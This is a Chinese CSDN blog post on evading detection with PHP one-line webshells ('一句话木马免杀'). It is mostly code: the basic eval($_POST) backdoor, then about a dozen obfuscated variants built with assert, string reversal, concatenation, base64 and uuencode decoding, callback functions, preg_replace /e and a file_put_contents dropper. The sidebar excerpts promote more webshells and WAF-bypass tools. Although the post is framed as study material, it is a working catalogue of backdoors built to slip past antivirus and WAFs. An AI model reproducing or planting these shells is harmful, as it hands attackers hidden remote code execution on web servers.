PHP一句话木马免杀学习

最新推荐文章于 2024-05-30 16:21:29 发布
最新推荐文章于 2024-05-30 16:21:29 发布
阅读量3k 收藏 25
点赞数 7
分类专栏: 安全 文章标签: php 学习 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45780190/article/details/124711810
版权

PHP一句话木马免杀学习

简单了解php一句话木马原理

<?php @eval($_POST['shell']);?>

首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。

在这里插入图片描述

将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();

在这里插入图片描述

一句话木马的变形

常用变形函数

convert_uudecode() #解码一个 uuencode 编码的字符串。
convert_uuencode() #使用 uuencode 编码一个字符串。
ucwords() #函数把字符串中每个单词的首字符转换为大写。
strrev () #反转字符串
trim() #函数从字符串的两端删除空白字符和其他预定义字符。
substr_replace() #函数把字符串的一部分替换为另一个字符串
substr() #函数返回字符串的一部分。
strtr() #函数转换字符串中特定的字符。
strtoupper() #函数把字符串转换为大写。
strtolower() #函数把字符串转换为小写。
implode()  #将一个一维数组的值转化为字符串。
str_rot13() #函数对字符串执行 ROT13 编码。


<?php
// 使用 uuencode 编码一个字符串
$a=convert_uuencode("assert");
$b=convert_uudecode($a);
$b($_POST["shell"]);
?>
1.相同功能函数替换

例如使用assert函数。assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动。如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。

<?php assert(@$_POST['shell']); ?>
2.使用变量
使用变量函数$a,变量储存了函数名assert,便可以直接用变量替代函数名。
<?php 
$a = "assert";
$a(@$_POST['shell']); 
?>


php可变变量
<?php
  $b = "assert";
  $a = 'b';
  $$a($_POST['hacker']);
?>
3.使用字符串拼接、大小写混淆、字符串逆序组合
使用大小写混淆配合字符串转小写函数strtolower组合而成
<?php  
$a="AssERT";  
$b=strtolower($a);     函数把字符串转换为小写
@$b($_POST['shell']);  
?>


使用字符串拼接、大小写混淆、字符串逆序组合而成
<?php  
$a="TR"."Es"."sA";  
$b=strtolower($a);      #函数把字符串转换为小写
$c=strrev($b);          #反转字符串
@$c($_POST['shell']);  
?>
4.自定义函数
create_function函数
把用户传递的数据生成一个函数fun(),然后再执行fun()

<?php
$fun = create_function('',$_POST['shell']);
$fun();
?>
5.回调函数
回调函数可以调用其它函数,被调用的函数是回调的第一个函数,被调用的函数的参数是回调的第二个参数。这样的一个语句也可以完成一句话木马。

常见回调函数
call_user_func_array()
call_user_func()
array_filter() 
array_walk()  
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var() 
filter_var_array() 
uasort() 
uksort() 
array_reduce()
array_walk() 
array_walk_recursive()


例如
<?php 
forward_static_call_array(assert,array($_POST["shell"]));
?>


<?php
@call_user_func(assert,$_POST['a']);
?>
6.str_replace函数
此函数作用是:在第三个参数中查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除“b”。

<?php
  $a = str_replace("b", "", "absbsbebrbt");
  $a($_POST['hacker']);
?>
7.base64_decode函数编码绕过
base64解密函数,"ZXZhbA=="是eval的base64加密。

<?php
$a=base64_decode("ZXZhbA==")
$a($_POST['a']);
?>
8.parse_str函数
执行这个函数后,生成一个变量$a,值为字符串"eval"

<?php
$str="a=eval";
parse_str($str);
$a($_POST['a']);
?>
9.preg_replace 函数
preg_replace 函数一个参数是一个正则表达式,按照 php的格式,表达式在两个/之间,如果在表达式末尾加上一个 e,则第二个参数就会被当做 php代码执行。
<?php
function fun()
{return $_POST['a'];}
@preg_replace("/test/e",fun(),"test test test");
?>
10."."操作符
<?php
$a="e"."v";
$b="a"."l";
$c=$a.$b;
$c($_POST['a']);
?>
11.file_put_contents函数
利用函数生成木马
生成一个文件,第一个参数是文件名,第二个参数是文件的内容。
<?php
$test='<?php $a=$_POST["shell"];assert($a); ?>';
file_put_contents("shell.php", $test);
?>
12.通过PHP的动态函数
<?php
$a = 'assert';
$b = '_POST';
$a($$b['shell']); //assert($_POST['shell']);
?>
kb2414
关注
  • 7
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
php解密 eval( base64_decode,base解密_php base64_decode解密
weixin_39777967的博客
03-10 2579
摘要 腾兴网为您分享:php base64_decode解密,银行帮,悟空单车,伪装定位,微商助手等软件知识,以及迷你盒子,固态硬盘优化软件,文华财经随身行,图片剪切工具,羊毛省钱,cygwin,极简名片,swf转avi,订货易,中国移动办公系统,发财猫,大地魂酒,比赛平台,锤锤小矮人,声之形等软件it资讯,欢迎关注腾兴网。eval base64_decode解密的方法,在修改程序代码时,往往会碰...
php一句大全,[各种一句木马大全]各种一句
weixin_39995351的博客
03-11 8518
PHP一句:1、普通一句2、防爆破一句 //菜刀地址http://192.168.64.137/x.php?x=mytest 密码:pass3、过狗一句 //菜刀地址 http://localhost/1.php?s=assert等价于$=@$GET['s'];@$($_POST['pass']);?>4、404隐藏一句preg_replace()方法中的e,只适用于php5及更早...
关于PHP的webshell小结
2401_84488651的博客
05-30 894
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了效果!
php一句木马
热门推荐
zlloveyouforever的博客
03-30 1万+
pikachu漏洞测试平台使用php一句木马利用文件上传漏洞以及文件包含漏洞。
php 一句木马简介
whatday的专栏
07-01 1万+
一句木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php @ev
php一句木马
qq_58683895的博客
11-21 1624
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成
php一句利用,常见php一句webshell解析
weixin_39606361的博客
03-10 4855
我理解的 webshell 是在服务器上以 web server application (比如apache,iis或者nginx)的权限进行远程任意代码执行的工具。当然通过一些手段也可能可以进行提权。最基础的 php webshell1将 post 请求中的 CMD 参数直接执行。1原理浅析:1、在PHP脚本语言中,eval(code)的功能是将code组合成php指令,然后将指令执行。2、就相...
PHP之一句木马
墨痕诉清风的博客
10-07 5585
目录 小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句。 3.利用php异或^构造字符串 木马构造 一句测试 异或转码数据 小结 小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句。 <?php $a = 'assert'; $b = '_GET'; $a(.
PHP一句木马
qq_64332865的博客
12-03 169
使用$_GET创建 <?php header("Content-Type: text/html; charset=gb2312"); @eval($_GET['cmd']); ?> 使用$_POST创建 <?php header("Content-Type: text/html; charset=gb2312"); @eval($_POST['cmd']); ?> 三 assert <?php header("Content-Type: text/h
PHP一句木马大全
weixin_45901902的博客
05-31 5185
PHP一句木马大全 由于PHP一句木马可以说有很多,简单的、中等的、复杂的…,今天主要是分享一些比较强悍的一些PHP一句木马大全; 一、利用404页面隐藏PHP小马 404 Not Found Not Found The requested URL was not found on this server. <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Foun
一句木马要点和防范注意事项
05-24
例如,一个简单的PHP一句木马可能如下所示: ```php <?php eval($_GET['cmd']); ?> ``` 这个例子中,`eval`函数会执行通过GET参数`cmd`传入的任何PHP代码,从而让攻击者能够控制服务器。 了解了一句木马的基本...
php一句cmdshell新型 (非一句木马)
10-30
PHP 一句 CMDShell 新型(非一句木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句木马是直接执行 PHP ...
木马只需要简单一句php
02-12
木马只需要简单的一句代码php文件就可以轻松过,可以参考
基于 python 实现的千倍速一句木马密码爆破工具
最新发布
07-05
一句木马 【作品名称】:基于 python 实现的千倍速一句木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
php大马一句,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
文件上传漏洞------一句木马原理解析
m0_69151365的博客
03-11 2010
这是一个最简单的一句木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
学习——PHP
ZxC789456302的博客
10-23 1755
php上马,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
PHP方法
wutiangui的博客
06-07 850
/ 函数变形 assert 达到毒软件识别)的效果:如。//将eval变形为evee。函数从字符串的两端删除空白字符和其他预定义字符。函数把字符串中每个单词的首字符转换为大写。函数把字符串的一部分替换为另一个字符串。函数把字符串中的首字符转换为大写。函数把字符串分割为更小的字符串。函数转换字符串中特定的字符。函数返回字符串的一部分。函数把字符串转换为大写。函数把字符串转换为小写。
PHP代码审计(死亡退出)
qq_36609913的博客
02-13 1607
代码: &lt;?php show_source(__FILE__); $c="&lt;?php exit;?&gt;"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值